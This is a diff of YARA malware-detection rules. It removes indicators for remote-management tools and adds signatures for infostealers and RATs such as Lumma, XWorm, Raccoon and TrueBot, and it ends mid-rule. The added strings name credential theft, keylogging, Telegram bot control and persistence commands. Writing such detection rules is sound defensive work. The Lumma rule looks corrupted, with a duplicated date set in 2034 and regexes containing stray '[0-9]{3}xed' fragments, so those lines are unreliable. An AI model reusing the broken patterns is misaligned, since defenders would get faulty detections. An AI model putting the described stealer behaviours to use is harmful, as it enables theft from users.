"https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L3-L27" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f36c0e23b20e4466100cf4ea2a91515bf1d54505e7b1f0926a4e416a04e0dbcf" + id = "42791b26-1cda-5bf3-b955-9de2dda1d63b" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9662-L9679" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5a2635066df031ba6e291c3ba14f9ed85bf3247c82c66eb1b3d3618fdebb47a6" score = 75 quality = 75 tags = "FILE" - clamav1 = "INDICATOR.Win.RMM.MeshAgent" strings: - $x1 = "\\MeshAgent" wide - $x2 = "Mesh Agent" wide - $x3 = "MeshDummy" wide - $x4 = "MeshCentral" wide - $x5 = "ILibRemoteLogging.c" ascii - $x6 = "AgentCore/MeshServer_" wide - $s1 = "var _tmp = 'Detected OS: ' + require('os').Name;" ascii - $s2 = "console.log(getSHA384FileHash(process.execPath).toString('hex'))" ascii - $s3 = "ScriptContainer.Create(): Error spawning child process, using [%s]" fullword ascii - $s4 = "{\"agent\":\"" ascii - $s6 = "process.versions.commitHash" fullword ascii - $s7 = "console.log('Error Initializing script from Zip file');process._exit();" fullword ascii + $s1 = "peer_list" fullword ascii + $s2 = "seed_hash" fullword ascii + $s3 = "pool_id" fullword ascii + $s4 = "%smutex=%s:%lu" ascii + $s5 = "miner.cfg" fullword ascii + $s6 = "{\"method\": \"%s\"%s}" ascii + $s7 = "/app/manager/%s" ascii + $s8 = "X-VNC-STATUS" fullword ascii + $s9 = "%s\\%lu.zip" fullword ascii + $s10 = "\\??\\%programdata%\\" wide condition: - uint16(0)==0x5a4d and (3 of ($x*) or (1 of ($x*) and 3 of ($s*)) or 6 of ($s*)) + uint16(0)==0x5a4d and 6 of them } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Meshagent_CERT : FILE +rule DITEKSHEN_MALWARE_Win_Multi_Family_Infostealer : FILE { meta: - description = "Detects Mesh Agent by (default) certificate. Review RMM Inventory" + description = "Detects Prynt, WorldWind, DarkEye, Stealerium and ToxicEye / TelegramRAT infostealers" author = "ditekSHen" - id = "b4b52faa-53a5-5ecf-bff8-984994449ee0" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L29-L42" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d8ac3aec723a87146be99aefbde5642d095d8d41f69c6f5e9981c39104790d33" + id = "960830ba-df0d-539d-be2a-7778229f79bd" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9681-L9703" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0fdd1cdc4f2e5bee6c763e6e6b2e79d85285e44e2b5e3168a56d7d360252ee99" score = 75 - quality = 75 + quality = 73 tags = "FILE" + strings: + $n1 = /Prynt|WorldWind|DarkEye(\s)?Stealer/ ascii wide + $n2 = "Stealerium" ascii wide + $x1 = "@FlatLineStealer" ascii wide + $x2 = "@CashOutGangTalk" ascii wide + $x3 = /\.Target\.(Passwords|Messengers|Browsers|VPN|Gaming)\./ ascii + $x4 = /\.Modules\.(Keylogger|Implant|Passwords|Messengers|Browsers|VPN|Gaming|Clipper)\./ ascii + $s1 = "Timeout /T 2 /Nobreak" fullword wide + $s2 = /---\s(AntiAnalysis|WebcamScreenshot|Keylogger|Clipper)/ wide + $s3 = "Downloading file: \"{file}\"" wide + $s4 = "/bot{0}/getUpdates?offset={1}" wide + $s5 = "send command to bot!" wide + $s6 = " *Keylogger " fullword wide + $s7 = "*Stealer" wide + $s8 = "Bot connected" wide + $s9 = "### {0} ### ({1})" wide + condition: - uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].issuer contains "MeshCentralRoot-") + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Connectwise_Screenconnect : FILE +rule DITEKSHEN_MALWARE_Win_Worldwind : FILE { meta: - description = "Detects ConnectWise Control (formerly ScreenConnect). Review RMM Inventory" + description = "Detects WorldWind infostealer" author = "ditekSHen" - id = "d752b7e4-b595-56cb-97f1-a60e73160e5a" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L62-L83" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "43003f97c33c631a2806ce2b82b2367d2452ceb21b0267b5dfe78b350b66924a" + id = "226f591a-dc06-54f5-96ae-d142f624ff71" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9705-L9726" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "9bb04fad460193cd877ea7f2de9337f69aadda01aee6c79f0a23cdf564b1e6c8" score = 75 quality = 75 tags = "FILE" - clamav1 = "INDICATOR.Win.RMM.ConnectWise-ScreenConnect" strings: - $s1 = "FILESYSCREENCONNECT.CORE, VERSION=" wide - $s2 = "feedback.screenconnect.com/Feedback.axd" wide - $s3 = /ScreenConnect (Software|Client)/ wide - $s4 = "ScreenConnect.InstallerActions!ScreenConnect." wide - $s5 = "\\\\.\\Pipe\\TerminalServer\\SystemExecSrvr\\" wide - $s6 = "\\jmorgan\\Source\\cwcontrol\\Custom\\DotNetRunner\\" wide - $s7 = "ScreenConnect." ascii - $s8 = "\\ScreenConnect.Core.pdb" ascii - $s9 = "relay.screenconnect.com" ascii + $c1 = /WorldWind(\s)?Stealer/ ascii wide + $x2 = "@FlatLineStealer" ascii wide + $x3 = "@CashOutGangTalk" ascii wide + $m1 = ".Passwords.Targets." ascii + $m2 = ".Modules.Keylogger" ascii + $m3 = ".Modules.Clipper" ascii + $m4 = ".Modules.Implant" ascii + $s1 = "--- Clipper" wide + $s2 = "Downloading file: \"{file}\"" wide + $s3 = "/bot{0}/getUpdates?offset={1}" wide + $s4 = "send command to bot!" wide + $s5 = " *Keylogger " fullword wide + $s6 = "*Stealer" wide + $s7 = "Bot connected" wide condition: - ( uint16(0)==0x5a4d or uint16(0)==0xcfd0) and 3 of them + uint16(0)==0x5a4d and 1 of ($c*) and (1 of ($x*) or 2 of ($m*) or 3 of ($s*)) } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Connectwise_Screenconnect_CERT : FILE +rule DITEKSHEN_MALWARE_Win_Prynt : FILE { meta: - description = "Detects ConnectWise Control (formerly ScreenConnect) by (default) certificate. Review RMM Inventory" + description = "Detects Prynt infostealer" author = "ditekSHen" - id = "7a032c24-8a9e-51c3-983e-62e13594aa35" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L85-L99" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "14291bd9ddb7fd3ee7932f8104687aae58fe7f5de13726153e5e1ee9c211f598" + id = "844fd100-b04e-5ff0-9fab-d45f48b55bcc" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9728-L9749" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "84f2b33285ab1d129a62940a02990639cc8f7c92d490d7257e6aed9170d1e34e" score = 75 quality = 75 tags = "FILE" + strings: + $c1 = /Prynt(\s)?Stealer/ ascii wide + $x2 = "@FlatLineStealer" ascii wide + $x3 = "@CashOutGangTalk" ascii wide + $m1 = ".Passwords.Targets." ascii + $m2 = ".Modules.Keylogger" ascii + $m3 = ".Modules.Clipper" ascii + $m4 = ".Modules.Implant" ascii + $s1 = "--- Clipper" wide + $s2 = "Downloading file: \"{file}\"" wide + $s3 = "/bot{0}/getUpdates?offset={1}" wide + $s4 = "send command to bot!" wide + $s5 = " *Keylogger " fullword wide + $s6 = "*Stealer" wide + $s7 = "Bot connected" wide + condition: - uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].issuer contains "DigiCert" and pe.signatures[i].subject contains "Connectwise, LLC") + uint16(0)==0x5a4d and 1 of ($c*) and (1 of ($x*) or 2 of ($m*) or 3 of ($s*)) } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Agent : FILE +rule DITEKSHEN_MALWARE_Win_Darkeye : FILE { meta: - description = "Detects FleetDeck Agent. Review RMM Inventory" + description = "Detects DarkEye infostealer" author = "ditekSHen" - id = "342a196c-1c5c-5951-85e4-d288311b4980" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L101-L123" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "121e59ea0088c519b618e740b57c560d60cced4a48c9d468e6bf1ab22fa8c8ff" + id = "5296fe28-b54e-5d0f-aa2f-2050db585d82" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9751-L9770" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5496dcbfe075a4030a446027765186e9dd1931561a29a481139281e1708ce87d" score = 75 quality = 75 tags = "FILE" - clamav1 = "INDICATOR.Win.RMM.FleetDeckAgent" strings: - $s1 = "fleetdeck.io/" ascii - $s2 = "load FleetDeck agent" ascii - $s3 = ".dev1.fleetdeck.io" ascii - $s4 = "remoteDesktopSessionMutex" ascii - $s5 = "main.remoteDesktopWatchdog" fullword ascii - $s6 = "main.virtualTerminalWatchdog" fullword ascii - $s7 = "main.meetRemoteDesktop" fullword ascii - $s8 = "repo.senri.se/prototype3/" ascii - $s9 = "main.svcIpcClient" fullword ascii - $s10 = "main.hookMqttLogging" fullword ascii + $c1 = /Prynt(\s)?Stealer/ ascii wide + $c2 = /WorldWind(\s)?Stealer/ ascii wide + $c3 = "ToxicEye" ascii wide + $x2 = "@FlatLineStealer" ascii wide + $x3 = "@CashOutGangTalk" ascii wide + $s1 = "--- Clipper" wide + $s2 = "Downloading file: \"{file}\"" wide + $s3 = "/bot{0}/getUpdates?offset={1}" wide + $s4 = "send command to bot!" wide + $s5 = " *Keylogger " fullword wide + $s6 = "*Stealer" wide + $s7 = "Bot connected" wide condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and not any of ($c*) and ((1 of ($x*) and 2 of ($s*)) or (4 of ($s*))) } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Commander : FILE +rule DITEKSHEN_MALWARE_Win_Invalidprinter : FILE { meta: - description = "Detects FleetDeck Commander. Review RMM Inventory" + description = "Invalid Printer (in2al5d p3in4er) Loader" author = "ditekSHen" - id = "27d533b5-7a66-507e-8ef8-ad9a6cd39ab1" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L125-L143" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "feee888c6649af0d8e8b08a38dda0bf7970089cf064f58b8bd9c6ebd8378e094" + id = "9b0a59e1-8105-5687-83b2-fb96229f59f9" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9772-L9782" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d14d53b2a73952244641f4e68a3dd5af8cb1e2bfc5936f300f9347b4881ceeb8" score = 75 quality = 75 tags = "FILE" - clamav1 = "INDICATOR.Win.RMM.FleetDeckCommander" + clamav_sig = "MALWARE.Win.InvalidPrinter" strings: - $s1 = "Software\\Microsoft\\FleetDeck Commander" ascii - $s2 = "fleetdeck.io/prototype3/" ascii - $s3 = "fleetdeck_commander_launcher.exe" ascii - $s4 = "fleetdeck_commander_svc.exe" ascii - $s5 = "|FleetDeck Commander" ascii - $s6 = "c:\\agent\\_work\\66\\s\\" ascii + $s1 = "in2al5d p3in4er" fullword ascii + $s2 = "CreateDXGIFactory" fullword ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and filesize <15000KB and all of them } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Commander_SVC : FILE +rule DITEKSHEN_MALWARE_Win_Raccoonv2 : FILE { meta: - description = "Detects FleetDeck Commander SVC. Review RMM Inventory" + description = "Detects Raccoon Stealer 2.0, also referred to as RecordBreaker" author = "ditekSHen" - id = "c03b61b4-36d0-5d38-9af8-e78b9930231f" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L145-L162" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "20bd69df3d058c24f83af312671cf249a3f26f54ef2e60f6b5b48a5bdb21b68b" + id = "2fc8313f-42f4-5b7e-8ae6-20455f736064" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9784-L9805" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d47bb9051923147010452bcd6e7c370c2ff9ea9095bcb920b64f69873b15ec16" score = 75 - quality = 75 + quality = 25 tags = "FILE" - clamav1 = "INDICATOR.Win.RMM.FleetDeckCommander-SVC" strings: - $s1 = "fleetdeckfork/execfuncargs(" ascii - $s2 = "REG ADD HKEY_CLASSES_ROOT\\%s /V \"URL Protocol\" /T REG_SZ /F" ascii - $s3 = "proceed: *.fleetdeck.io" ascii - $s4 = "fleetdeck.io/prototype3/commander_svc" ascii - $s5 = "commanderupdate.fleetdeck.io" ascii + $f1 = "sgnl_" fullword ascii + $f2 = "tlgrm_" fullword ascii + $f3 = "ews_" fullword ascii + $f4 = "grbr_" fullword ascii + $f5 = "dscrd_" fullword ascii + $f6 = "wlts_" fullword ascii + $f7 = "scrnsht_" fullword ascii + $f8 = "sstmnfo_" fullword ascii + $s1 = "machineId=" fullword ascii + $s2 = "&configId=" fullword ascii + $s3 = "URL:%s" fullword ascii + $s4 = "USR:%s" fullword ascii + $s5 = "PASS:%s" fullword ascii + $s6 = "Content-Type: application/x-object" fullword ascii condition: - uint16(0)==0x5a4d and 4 of them + (( uint16(0)==0x5a4d and (4 of ($f*) or all of ($s*) or 7 of them )) or 10 of them ) } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Commander_Launcher : FILE +rule DITEKSHEN_MALWARE_Win_Truebot : FILE { meta: - description = "Detects FleetDeck Commander Launcher. Review RMM Inventory" + description = "Detects TrueBot" author = "ditekSHen" - id = "9a4a221e-7a7a-5008-b509-7f01e4a3eea6" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L164-L178" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9429f55f162eebc58a7a9af8706244438cb76b1f0987facbb52d29997ed48b95" + id = "7210a0bd-d310-55bf-bb0c-14cadb59bd67" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9807-L9827" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a92141ef0aa7d68b3594a0f56c0370498fe5751a472c9011ac8b92ae46e88e53" score = 75 quality = 75 tags = "FILE" - clamav1 = "INDICATOR.Win.RMM.FleetDeckCommander-Launcher" strings: - $s1 = "fleetdeck.io/prototype3/commander_launcher" ascii - $s2 = "FleetDeck Commander Launcher" ascii + $s1 = "%s\\rundll32.exe" fullword wide + $s2 = "ChkdskExs" fullword wide + $s3 = "n=%s&o=%s&a=%d&u=%s&p=%s&d=%s" ascii + $s4 = "KLLS" fullword ascii + $s5 = "%s\\%08x-%08x.ps1" fullword ascii + $s6 = ".JSONIP" ascii + $s7 = "CreateProcessAsUserW res %d err %d" fullword ascii + $s8 = "ldr_sys64.dll" fullword ascii + $s9 = "SVCHOST" fullword ascii + $s10 = "WINLOGON" fullword ascii + $s11 = { 67 6f 6f 67 6c 65 2e 63 6f 6d 00 00 00 00 00 00 + 2f 00 63 00 20 00 64 00 65 00 6c 00 20 00 00 00 + 20 00 3e 00 3e 00 20 00 4e 00 55 00 4c 00 } condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and 6 of them } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_CERT : FILE +rule DITEKSHEN_MALWARE_Win_Lummastealer : FILE { meta: - description = "Detects FleetDeck agent by (default) certificate. Review RMM Inventory" + description = "Detects Lumma Stealer" author = "ditekSHen" - id = "49a6b0bb-599a-54b0-85bc-b2f6849e3ae8" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L180-L198" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "8f72713eb4a5d9d32629351b937eee7de5d83abe1cd409cd8c3a8c9c52e6e490" + id = "b54521ab-4a31-5c1c-8ef2-b08b0f713693" + date = "2034-02-17" + date = "2034-02-17" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9829-L9854" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "74014c5bcc85977b90faed93b348c34e47ee033b06c2f145348ca9c54c27bda5" score = 75 - quality = 75 + quality = 73 tags = "FILE" + clamav1 = "MALWARE.Win.Trojan.LummaStealer" + + strings: + $x1 = /Lum[0-9]{3}xedmaC2,\sBuild/ ascii + $x2 = /LID\(Lu[0-9]{3}xedmma\sID\):/ ascii + $s1 = /os_c[0-9]{3}xedrypt\.encry[0-9]{3}xedpted_key/ fullword ascii + $s2 = "c2sock" wide + $s3 = "c2conf" wide + $s4 = "TeslaBrowser/" wide + $s5 = "Software.txt" fullword wide + $s6 = "SysmonDrv" fullword + $s7 = "*.eml" fullword wide nocase + $s8 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" wide + $s9 = "- Screen Resoluton:" ascii + $s10 = "lid=%s" ascii + $s11 = "&ver=" ascii + $s12 = "769cb9aa22f4ccc412f9cbc81feedd" fullword wide + $s13 = "gapi-node.io" fullword ascii condition: - uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : ((pe.signatures[i].issuer contains "Sectigo Limited" or pe.signatures[i].issuer contains "COMODO CA Limited") and pe.signatures[i].subject contains "FleetDeck Inc") + uint16(0)==0x5a4d and ( all of ($x*) or (1 of ($x*) and 2 of ($s*)) or 5 of ($s*) or 7 of them ) } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Pdqconnect_Agent : FILE +rule DITEKSHEN_MALWARE_Win_Xworm : FILE { meta: - description = "Detects PDQ Connect Agent. Review RMM Inventory" + description = "Detects XWorm" author = "ditekSHen" - id = "067e75a3-291b-500f-865d-8758eebe91e7" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L200-L227" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "34d0b07925551d1b08b86aa226c59aba569b6548cfa00a86ce6b1f271e427662" + id = "bf9115a7-850a-5326-860c-a9a71bc7e50c" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9856-L9882" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5a86c2f0a188135e53d86c176806a208abbe3dd830bde364016859ffa5294bd7" score = 75 - quality = 75 + quality = 73 tags = "FILE" + clamav_sig = "MALWARE.Win.XWorm" strings: - $api1 = "/devices/register" ascii - $api2 = "/devices/socket/websocket?device_id=" ascii - $api3 = "/devices/tasks" ascii - $api4 = "/devices/auth-challenge" ascii - $api5 = "/devices/receiver/Url" ascii - $s1 = "sign_pdq.rs" ascii - $s2 = "x-pdq-dateCredential=(.+?)/" ascii - $s3 = "pdq-connect-agent" ascii - $s4 = "PDQ Connect Agent" ascii - $s5 = "PDQConnectAgent" ascii - $s6 = "PDQConnectAgentsrc\\logger.rs" ascii - $s7 = "-PDQ-Key-IdsUser-Agent" ascii - $s8 = "\\PDQ\\PDQConnectAgent\\" ascii - $s9 = "\\pdq_connect_agent.pdb" ascii - $s10 = "task_ids[]PDQ rover" ascii - $s11 = "https://app.pdq.com/" ascii + $x1 = "XWorm " wide nocase + $x2 = /XWorm\s(V|v)\d+\.\d+/ fullword wide + $s1 = "RunBotKiller" fullword wide + $s2 = "XKlog.txt" fullword wide + $s3 = /(shell|reg)fuc/ fullword wide + $s4 = "closeshell" fullword ascii + $s5 = { 62 00 79 00 70 00 73 00 73 00 00 ?? 63 00 61 00 6c 00 6c 00 75 00 61 00 63 00 00 ?? 73 00 63 00 } + $s6 = { 44 00 44 00 6f 00 73 00 54 00 00 ?? 43 00 69 00 6c 00 70 00 70 00 65 00 72 00 00 ?? 50 00 45 00 } + $s7 = { 69 00 6e 00 6a 00 52 00 75 00 6e 00 00 ?? 73 00 74 00 61 00 72 00 74 00 75 00 73 00 62 } + $s8 = { 48 6f 73 74 00 50 6f 72 74 00 75 70 6c 6f 61 64 65 72 00 6e 61 6d 65 65 65 00 4b 45 59 00 53 50 4c 00 4d 75 74 65 78 78 00 } + $v2_1 = "PING!" fullword wide + $v2_2 = "Urlhide" fullword wide + $v2_3 = /PC(Restart|Shutdown)/ fullword wide + $v2_4 = /(Start|Stop)(DDos|Report)/ fullword wide + $v2_5 = /Offline(Get|Keylogger)/ wide + $v2_6 = "injRun" fullword wide + $v2_7 = "Xchat" fullword wide + $v2_8 = "UACFunc" fullword ascii wide condition: - ( uint16(0)==0x5a4d or uint16(0)==0xcfd0) and (4 of ($s*) or (3 of ($api*) and 1 of ($s*))) + uint16(0)==0x5a4d and ((1 of ($x*) and (3 of ($s*) or 3 of ($v2*))) or 6 of them ) } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Pdqconnect_Agent_CERT : FILE +rule DITEKSHEN_MALWARE_Win_Clipbanker03 : FILE { meta: - description = "Detects PDQ Connect Agent by (default) certificate. Review RMM Inventory" + description = "Detects ClipBanker" author = "ditekSHen" - id = "7e830cf0-8f47-5b38-85cd-9777a6878cf1" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L229-L243" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "373a32b8bfd8c4295ba0c0302a217ccfbb7c7c616f91035097adbc5384b8afdb" + id = "57ba7d33-eba4-5bc1-9893-5441e439b900" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9884-L9904" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "29bbb833c9aecc18b398b8c0d80649994f4992277d1aa2ee4ae8e319b59125d5" score = 75 - quality = 75 + quality = 50 tags = "FILE" + strings: + $s1 = "UNIC_KEY" fullword wide + $s2 = "[StartUp]" fullword wide + $s3 = "[Kill]" fullword wide + $s4 = "[antivm]" fullword wide + $s5 = "AntiVM" fullword ascii + $s6 = "AntiKill" fullword ascii + $s7 = "hWndRemove" fullword ascii + $s8 = "/Clip(watch|Chang|Mon)/" fullword ascii + $w1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0" fullword wide + $w2 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" fullword wide + $w3 = "/create /sc MINUTE /mo 1 /tn \"Windows Service\" /tr \"" fullword wide + $w4 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" fullword wide + $w5 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide + condition: - uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].issuer contains "DigiCert, Inc." and pe.signatures[i].subject contains "PDQ.com Corporation") + uint16(0)==0x5a4d and (5 of ($s*) or all of ($w*) or 6 of them ) } import "pe" -rule DITEKSHEN_INDICATOR_RMM_Pulseway_Pcmontasksrv : FILE +rule DITEKSHEN_MALWARE_Win_Dotrunpex : FILE { meta: - description = "Detects Pulseway pcmontask and service user agent responsible for Remote Control, Screens View, Computer Lock, etc" + description = "Detects dotRunpeX injector" author = "ditekSHen" - id = "83901679-ffff-5710-b472-ece592e6764f" - date = "2023-11-16" - modified = "2023-11-16" - reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_rmm.yar#L245-L266" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "80ba217960dd1ddeb220545c1cccbe96d9b676d327364e1ca8a9dde2b059261f" + id = "4845edc1-110c-59a2-ace0-57a62b1e69e8" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://github.com/ditekshen/detection" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L9906-L9918" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d7f802f233b2b4ff2c250bb8e96649f307bbb3457c78004751401b3ea7f531a0" score = 75 quality = 75 tags = "FILE" - clamav1 = 